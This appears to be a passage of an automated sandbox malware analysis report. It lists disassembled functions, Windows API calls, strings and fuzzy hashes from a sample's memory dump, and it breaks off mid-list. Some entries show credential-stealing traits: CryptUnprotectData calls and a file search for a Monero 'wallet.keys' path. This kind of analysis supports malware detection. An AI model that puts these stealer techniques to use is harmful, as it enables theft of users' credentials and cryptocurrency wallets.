                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,011FD8C8,00000000,?,00B20E10,00000000,?,00000000,00000000), ref: 00B17A63
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B17A6A
                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,011FD8C8,00000000,?,00B20E10,00000000,?,00000000,00000000,?), ref: 00B17A7D
                  • wsprintfA.USER32 ref: 00B17AB7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                  • String ID:
                  • API String ID: 3317088062-0
                  • Opcode ID: a1309e997bba2d5b6c58b73cb84e13d3515325219e796060b225f9b6db8f089e
                  • Instruction ID: 29d80129b923c07dbd489c5021b26d98209c52f6e9b946ac99cb708b78d2786c
                  • Opcode Fuzzy Hash: a1309e997bba2d5b6c58b73cb84e13d3515325219e796060b225f9b6db8f089e
                  • Instruction Fuzzy Hash: B51170B1985228DBEB108F58DC45F9AB7B8FB05711F1042D6E50A93290CB741A40CF51
                  Function 00EDEE6A Relevance: 5.4, Strings: 3, Instructions: 1666COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ZR1$bJ6O$e?_]
                  • API String ID: 0-2852574638
                  • Opcode ID: 261c4b0ee95d6220f13897671e4e639d232c9e2b35a7e366731d5182a2926911
                  • Instruction ID: 6dd82de4ac96bce5e041efc5a32dbc63cd0458fc60494862ef254a80b3adedc0
                  • Opcode Fuzzy Hash: 261c4b0ee95d6220f13897671e4e639d232c9e2b35a7e366731d5182a2926911
                  • Instruction Fuzzy Hash: CBB218F3A0C2049FE304AE2DDC8566ABBE9EFD4320F1A493DEAC4D7744E93558058796
                  Function 00EDD3A7 Relevance: 5.4, Strings: 3, Instructions: 1606COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ^lM$a,}l$o)W'
                  • API String ID: 0-1291390679
                  • Opcode ID: c1d4b6e205df9b0e6fdb5ef93fe3e3865e4e9cf34c22b13516329cbd9a499106
                  • Instruction ID: 65edc681b631d9d4f6a6121fbf8dc2615d173fe9d59794efe292a5ce5749305f
                  • Opcode Fuzzy Hash: c1d4b6e205df9b0e6fdb5ef93fe3e3865e4e9cf34c22b13516329cbd9a499106
                  • Instruction Fuzzy Hash: EBB239F36082049FD304AE2DEC8567AFBE9EF94720F1A493DEAC5C7744E93598058693
                  Function 00EDBCB7 Relevance: 5.1, Strings: 3, Instructions: 1319COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 4wy$An~=$m[}w
                  • API String ID: 0-1696683974
                  • Opcode ID: 05fa59f7a442931669c77dceaa637ac1c8f7c9425af070fa046a0459b80431a8
                  • Instruction ID: 7ee199964c020fb10b1ed393c765fa419a4f5d03c8274b3a36aea6122c85b43a
                  • Opcode Fuzzy Hash: 05fa59f7a442931669c77dceaa637ac1c8f7c9425af070fa046a0459b80431a8
                  • Instruction Fuzzy Hash: 499227F360C204AFE7046E2DEC8567AFBE9EF94320F1A493DE6C5D3740EA7558018696
                  Function 00B13720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                  Download Yara Rule
                  APIs
                  • CoCreateInstance.COMBASE(00B1E118,00000000,00000001,00B1E108,00000000), ref: 00B13758
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00B137B0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharCreateInstanceMultiWide
                  • String ID:
                  • API String ID: 123533781-0
                  • Opcode ID: bf2ecf64433e11e9e77c7b20adef9acd59f79a68bc574fd857116314e7c53ba2
                  • Instruction ID: d778f49479bee47ce242fe96c98a4a65f3f3853ce9dfe575946a9def1110ea36
                  • Opcode Fuzzy Hash: bf2ecf64433e11e9e77c7b20adef9acd59f79a68bc574fd857116314e7c53ba2
                  • Instruction Fuzzy Hash: BB41D774A40A289FDB24DB58CC95BDAB7B5BB48702F4041D8A618E72D0E771AEC5CF50
                  Function 00B09B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00B09B84
                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00B09BA3
                  • LocalFree.KERNEL32(?), ref: 00B09BD3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$AllocCryptDataFreeUnprotect
                  • String ID:
                  • API String ID: 2068576380-0
                  • Opcode ID: 7d8a06ed8440bf58506ed257d443e3e3338864c071dc69fbe05f826782afb90d
                  • Instruction ID: 093f52250a2bec3cce61f8327a3065d484bda078c9011d0d8c081f865b8181c3
                  • Opcode Fuzzy Hash: 7d8a06ed8440bf58506ed257d443e3e3338864c071dc69fbe05f826782afb90d
                  • Instruction Fuzzy Hash: C511CCB9A00209EFDB04DF98D985AAE77F5FF89300F104598E91597390D774AE10CF61
                  Function 00D87FC0 Relevance: 4.0, Strings: 3, Instructions: 203COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Sjg[$`M|z$b{M
                  • API String ID: 0-3163793524
                  • Opcode ID: 43919284756039df6387217bd70a5a231b712a4a5d152d007a9884c85e5d628f
                  • Instruction ID: 49dfb285376e02ad052cf497c3b39858657fd52bd06ee8d66d86393f3b108b4d
                  • Opcode Fuzzy Hash: 43919284756039df6387217bd70a5a231b712a4a5d152d007a9884c85e5d628f
                  • Instruction Fuzzy Hash: 185158F3F082144BF3009978DC897AAB6D6DBD4320F2B463DDA98CB7C4D97D98458282
                  Function 00E65303 Relevance: 2.8, Strings: 2, Instructions: 258COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: HVyv$>\
                  • API String ID: 0-261519995
                  • Opcode ID: 72dfd7eb339f6c65c45aac54e36b4815de034c2ffc03dbe577e25bd07a6b5c98
                  • Instruction ID: 08f662e324b0087205afc7af139ca2bf7fb73ca2e1c8c6bfd5a99e4a35d6fcd3
                  • Opcode Fuzzy Hash: 72dfd7eb339f6c65c45aac54e36b4815de034c2ffc03dbe577e25bd07a6b5c98
                  • Instruction Fuzzy Hash: 488136F3D186204BE3146E39EC84776B7D9DB94720F2B863DDF98A3784E979580482C6
                  Function 00B0F68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B215B8,00B20D96), ref: 00B0F71E
                  • StrCmpCA.SHLWAPI(?,00B215BC), ref: 00B0F76F
                  • StrCmpCA.SHLWAPI(?,00B215C0), ref: 00B0F785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0FAB1
                  • FindClose.KERNEL32(000000FF), ref: 00B0FAC3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: d7bd88228c41c47a83da6ea6be90487ff70b94821367e25325095ae9568bdad7
                  • Instruction ID: ca4d46feb1107c022185005a6fb52922f799bc0b6518d14661466b3af9071af6
                  • Opcode Fuzzy Hash: d7bd88228c41c47a83da6ea6be90487ff70b94821367e25325095ae9568bdad7
                  • Instruction Fuzzy Hash: 9A11963580115D9BDB24FBB0DD559ED77B8AF10310F8046E9A51A674D2EF303B8ACB92
                  Function 00D7D8F0 Relevance: 1.5, Strings: 1, Instructions: 242COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Q=?
                  • API String ID: 0-2595168370
                  • Opcode ID: 4dc7264ba28d59f8a4dc7eaa8723086e05799c56cb624e9f67cb2b38171a67ef
                  • Instruction ID: 6a757c1cc500f7223d2354617ad33bb7a9b59ce453b32df36d4901aa6e683785
                  • Opcode Fuzzy Hash: 4dc7264ba28d59f8a4dc7eaa8723086e05799c56cb624e9f67cb2b38171a67ef
                  • Instruction Fuzzy Hash: 427123B3E182105BF308A929DC9576BB6D5EB94320F1B463DEE99E7784D9395C0182C2
                  Function 00E6D6A5 Relevance: 1.5, Strings: 1, Instructions: 222COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: .+a}
                  • API String ID: 0-132381047
                  • Opcode ID: 6852bfe17ab8d17de0e242fea7f21b652597da26253ad939e3b83b94fe0e7341
                  • Instruction ID: f44e2b1db37ac265ce446f7f5b8a4a831755867656064575b94808d5acfc4a00
                  • Opcode Fuzzy Hash: 6852bfe17ab8d17de0e242fea7f21b652597da26253ad939e3b83b94fe0e7341
                  • Instruction Fuzzy Hash: 1D6146F3A483046BE308AE6EDC8177AB7DAEBD4320F16853DE7C587780E97945018296
                  Function 00ED2392 Relevance: .8, Instructions: 817COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
